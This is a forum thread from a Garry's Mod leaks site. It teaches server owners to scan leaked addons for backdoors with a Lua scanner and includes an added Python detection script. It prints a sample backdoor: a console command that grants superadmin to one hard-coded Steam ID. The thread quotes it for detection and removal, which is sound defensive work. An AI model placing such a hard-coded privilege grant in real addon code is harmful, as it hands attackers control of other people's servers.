Garry's Mod Leaks

- How To Look For Backdoors On Leaks -

Submitted by TupacAmaruShakur, Thread ID: 113573

Thread Closed
28-12-2018, 07:34 AM
This post was last modified: 28-12-2018, 08:03 AM by TupacAmaruShakur
#1
Hello,

I present this tutorial, which will help you find out if your server suffers from a backdoor. An addon can be infected, and the people who infected it can give themselves superadmin on your server or do more malicious damage.
As a reminder, a person cannot access your FTP if you have not given them the access yourself.

Step 1: Find the backdoor

-You will first download this addon and put it in the addons folder of your server:

1- Click Me And I Will Download What You Need! (https://github.com/THABBuzzkill/nomalua/archive/master.zip)


Where the download came from and more instructions

2-

-Add the files/addons you want scanned to your addons folder.
-Then restart your server and connect once it reboots.
-Once you are on your server, type in your console (in-game console):

nomalua_scan


-Your server will appear to crash during scanning, i.e. for 10-15 seconds, but it does not actually crash, so stay on.
-After the 10-15 second freeze, re-open your console (in-game) and you'll see something like:


1 - FILESYS (Reading file contents) addons/smugglesystem/lua/autorun/server/smug_server.lua:138 local PositionFile = file.Read("craphead_scripts/smuggle_system/".. string.lower(game.GetMap()) .."/smuggletruck_location.txt", "DATA")
1 - MISC (References global table) gamemodes/darkrp/gamemode/libraries/fn.lua:120 GetGlobalVar = function(key) return _G[key] end
4 - NETWORK (HTTP server call) lua/autorun/photon/cl_emv_airel.lua:17 http.Fetch( fetchUrl,
1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:52 local fileRead = file.Read( "playerlist.txt" )
1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:92 local fileCheck = file.Read("playerlist.txt")
1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:142 file.Read( "playerlist.txt" )
4 - NETWORK (HTTP server call) gamemodes/darkrp/gamemode/modules/darkrpmessages/cl_darkrpmessage.lua:16 http.Fetch("https://raw.github.com/FPtje/DarkRPMotd/master/motd.txt", receiveMOTD, fn.Id)
2 - AUTHENT (Presence of Steam ID) lua/autorun/tdmcars_vols60_police.lua:2 Guillaume (STEAM_0:0:71249946)
1 - MISC (References global table) lua/includes/util.lua:267 _G[ name ] = NUM_AI_CLASSES
2 - FILESYS (File deletion) lua/includes/util/javascript_util.lua:13 html:AddFunction( "gmod", "DeleteLocal", function( param ) file.Delete( param, "MOD" ) end )
1 - MISC (References global table) lua/includes/util/javascript_util.lua:14 html:AddFunction( "gmod", "FetchItems", function( namespace, cat, offset, perpage, ... ) _G[ namespace ]:Fetch( cat, tonumber( offset ), tonumber( perpage ), { ... } ) end )
1 - MISC (References global table) lua/includes/util/javascript_util.lua:16 html:AddFunction( "gmod", "Publish", function( namespace, file, background ) _G[ namespace ]:Publish( file, background ) end )
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:52 Chromebolt A.K.A. Unib5 (STEAM_0:1:19045957)
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:55 Falco A.K.A. FPtje Atheos (STEAM_0:0:8944068)
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:62 Eusion (STEAM_0:0:20450406) (3 commits on old SVN)


We see many things.

For example, with an infected addon you will see something like this:

2 - AUTHENT (Presence of Steam ID) addons/prisonrptimer/lua/autorun/prisonrp_timer.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then


The line 'if ( ply:SteamID() == "STEAM_0:1:64045285") then' is clearly a backdoor.
Look at the lines 'AUTHENT (Presence of Steam ID)' and if

Step 2: Remove the backdoor

We will take that line:

2 - AUTHENT (Presence of Steam ID) addons/prisonrptimer/lua/autorun/prisonrp_timer.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then


To remove the infection, go to the path you were given, addons/prisonrptimer/lua/autorun, open prisonrp_timer.lua and go to line 101.
We have this at line 101, and you just have to remove the person's check so that they will not have the opportunity to do things:

-- The injected console command: only the hard-coded Steam ID gets superadmin
concommand.Add( "EFM", function(ply)
    if ( ply:SteamID() == "STEAM_0:1:64045285") then
        RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
    else
        ply:ChatPrint("Rcon commands Enable, " .. ply:Name() .. ".")
    end
end)


I hope I helped you with this!


Scan and other information

SHA256: 211d48a1f2d5ac73a48f94ed80dea0e458a0137fca453c0eccb9acfe79952920
File name: detect.zip
Detection ratio: 0 / 54
Analysis date: 2016-07-21 06:37:35 UTC ( 2 minutes ago )


Contained files
This file is a compressed stream containing 11 files.
[+] nomalua/lua/autorun/init.lua unknown 245 Bytes
[+] nomalua/lua/cl_nomalua.lua unknown 191 Bytes
[+] nomalua/lua/sh_nomalua.lua unknown 109 Bytes
[+] nomalua/lua/sv_nomalua.lua unknown 3451 Bytes
[+] nomalua/lua/sv_nomalua_checkdefs.lua unknown 1950 Bytes
[+] nomalua/lua/sv_nomalua_utils.lua unknown 2137 Bytes
[+] nomalua/lua/sv_nomalua_whitelist.lua unknown 1188 Bytes
[+] nomalua/readme.txt unknown 6395 Bytes
[+] nomalua/ directory 0 Bytes
[+] nomalua/lua/ directory 0 Bytes
Compression metadata
Contained files: 11
Uncompressed size: 15666
Highest datetime: 2015-04-21 10:27:54
Lowest datetime: 2015-04-20 17:44:54
Contained files by extension
lua: 7
txt: 1
Contained files by type
unknown: 8
directory: 3
ExifTool file metadata
MIMEType: application/zip
ZipRequiredVersion: 20
ZipCRC: 0x00000000
FileType: ZIP
ZipCompression: None
ZipUncompressedSize: 0
ZipCompressedSize: 0
FileTypeExtension: zip
ZipFileName: nomalua/
ZipBitFlag: 0
ZipModifyDate: 2015:04:21 10:27:26

MD5: 80d8970db9c26c7fa0c15ad9ac794322
SHA1: 9e09f2a7e850250de685b2eb0238de9eebad1e3f
SHA256: 211d48a1f2d5ac73a48f94ed80dea0e458a0137fca453c0eccb9acfe79952920
ssdeep: 192:B9pCeI4k44AcA5xky4litNWmoxaoVTGFnPZ9yUYTc+X:B94Ok4vcAJmm9ogzy7I+X
File size: 8.1 KB ( 8302 bytes )
File type: ZIP
Magic literal: Zip archive data, at least v2.0 to extract
TrID: ZIP compressed archive (100.0%)
Tags: zip
VirusTotal metadata
First submission: 2016-07-21 06:37:35 UTC ( 2 minutes ago )
Last submission: 2016-07-21 06:37:35 UTC ( 2 minutes ago )
File names: detect.zip




I HAVE ANOTHER SCANNER ON THE WAY, BOTH ARE GOOD, SO IT'S OPINION. TELL ME WHAT YOU THINK!
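As an added example (not part of the original post and not the nomalua project's own code), here is the same kind of check the post describes, written as a small Python scanner over addon Lua files. It reports findings in the "score - CATEGORY (description) path:line code" layout of the scan output above, and additionally correlates a hard-coded Steam ID with a nearby ULX privilege grant, which is the combination the post calls a backdoor. The sample addon file, the placeholder Steam ID and the per-rule scores are constructed for this example; the rule names mirror the categories seen in the post's output.

```python
"""Static scanner for Garry's Mod Lua addons (example code, not nomalua itself)."""
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample addon file. The Steam ID is a placeholder, not a real account.
SAMPLE_LUA = """-- constructed sample: a harmless timer with an injected privilege check
local PositionFile = file.Read("prisonrp/positions.txt", "DATA")
timer.Create("prisonrp_tick", 1, 0, function() end)
concommand.Add("EFM", function(ply)
    if ( ply:SteamID() == "STEAM_0:1:00000000" ) then
        RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
    else
        ply:ChatPrint("Rcon commands enabled, " .. ply:Name() .. ".")
    end
end)
"""


@dataclass
class Finding:
    path: str
    line_no: int
    category: str
    description: str
    score: int
    text: str

    def fmt(self) -> str:
        # Same "score - CATEGORY (description) path:line code" layout as the post's scan output
        return f"{self.score} - {self.category} ({self.description}) {self.path}:{self.line_no} {self.text}"


# (category, description, pattern, score); the scores are this example's own weighting
RULES = [
    ("AUTHENT", "Presence of Steam ID", re.compile(r"STEAM_[0-5]:[01]:\d+"), 2),
    ("AUTHENT", "Privilege grant via ULX", re.compile(r'"adduserid"|"superadmin"'), 3),
    ("NETWORK", "HTTP server call", re.compile(r"\bhttp\.(Fetch|Post)\b"), 4),
    ("FILESYS", "File deletion", re.compile(r"\bfile\.Delete\b"), 2),
    ("FILESYS", "Reading file contents", re.compile(r"\bfile\.Read\b"), 1),
    ("MISC", "Dynamic code execution", re.compile(r"\b(RunString|RunStringEx|CompileString)\b"), 4),
    ("MISC", "References global table", re.compile(r"\b_G\b"), 1),
]


def scan_source(path: str, source: str) -> List[Finding]:
    """Apply every rule to every non-comment line of one Lua file."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(source.splitlines(), start=1):
        line = raw.strip()
        if line.startswith("--"):  # skip full-line Lua comments
            continue
        for category, description, pattern, score in RULES:
            if pattern.search(line):
                findings.append(Finding(path, line_no, category, description, score, line))
    return findings


def scan_directory(root: str) -> List[Finding]:
    """Walk an addons folder and scan every .lua file under it."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(".lua"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(os.path.relpath(full, root), fh.read()))
    return findings


def backdoor_candidates(findings: List[Finding], window: int = 3) -> List[Tuple[str, int, int]]:
    """Hard-coded Steam ID within `window` lines of a ULX privilege grant in the same file.
    A Steam ID on its own is often just a credits comment (see the DarkRP lines in the
    post's output); next to a superadmin grant it is the pattern the post calls a backdoor."""
    ids = [f for f in findings if f.description == "Presence of Steam ID"]
    grants = [f for f in findings if f.description == "Privilege grant via ULX"]
    hits = []
    for sid in ids:
        for grant in grants:
            if sid.path == grant.path and abs(sid.line_no - grant.line_no) <= window:
                hits.append((sid.path, sid.line_no, grant.line_no))
    return hits


def score_by_category(findings: List[Finding]) -> Dict[str, int]:
    totals: Dict[str, int] = {}
    for f in findings:
        totals[f.category] = totals.get(f.category, 0) + f.score
    return totals


if __name__ == "__main__":
    results = scan_source("addons/sample/lua/autorun/sample.lua", SAMPLE_LUA)
    for f in results:
        print(f.fmt())
    for path, id_line, grant_line in backdoor_candidates(results):
        print(f"BACKDOOR CANDIDATE: {path} Steam ID at line {id_line}, privilege grant at line {grant_line}")
    print(score_by_category(results))
```

Run it against a real addons folder with `scan_directory("addons")`; the correlation step is what separates a harmless credits list from a hard-coded ID gating a superadmin grant, so review those candidates first and treat the bare FILESYS/MISC lines as context.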

RE: - How To Look For Backdoors On Leaks -

#2
Watch this program be a backdoor xd

jk thanks for this

RE: - How To Look For Backdoors On Leaks -

OP
#3
28-12-2018, 03:57 PM
Kermit2781 Wrote:
Watch this program be a backdoor xd

jk thanks for this

Lol, if someone wanted it to be, it could be, but it's not. I'm working on another one; it's supposed to be better than this one! I'll post it soon!

RE: - How To Look For Backdoors On Leaks -

#4
Kiss edccdeec Kiss
Kiss
Kiss
Kiss
Kiss

RE: - How To Look For Backdoors On Leaks -

#5
Ohh nice, this is simple, thx for the help. I hate backdoors

RE: - How To Look For Backdoors On Leaks -

#6
Good tutorial! I hope I'll use this one day if I ever get into gmod again..

RE: - How To Look For Backdoors On Leaks -

#7
THNKS MAN, it's a good script to check for backdoors, I have removed 5 backdoors

RE: - How To Look For Backdoors On Leaks -

#8
this is pretty cool, been looking for something like this for a long time

RE: - How To Look For Backdoors On Leaks -

#9
Genuinely good guide. Leaked addons often contain backdoors, and that would be lethal for one's server. This thread is quite good for "newbs", as somewhat experienced LUA coders will easily spot unnecessary or malicious code.

RE: - How To Look For Backdoors On Leaks -

#10
Thanks man, much appreciated. You did a good job if you made it; if not, thanks a lot for sharing
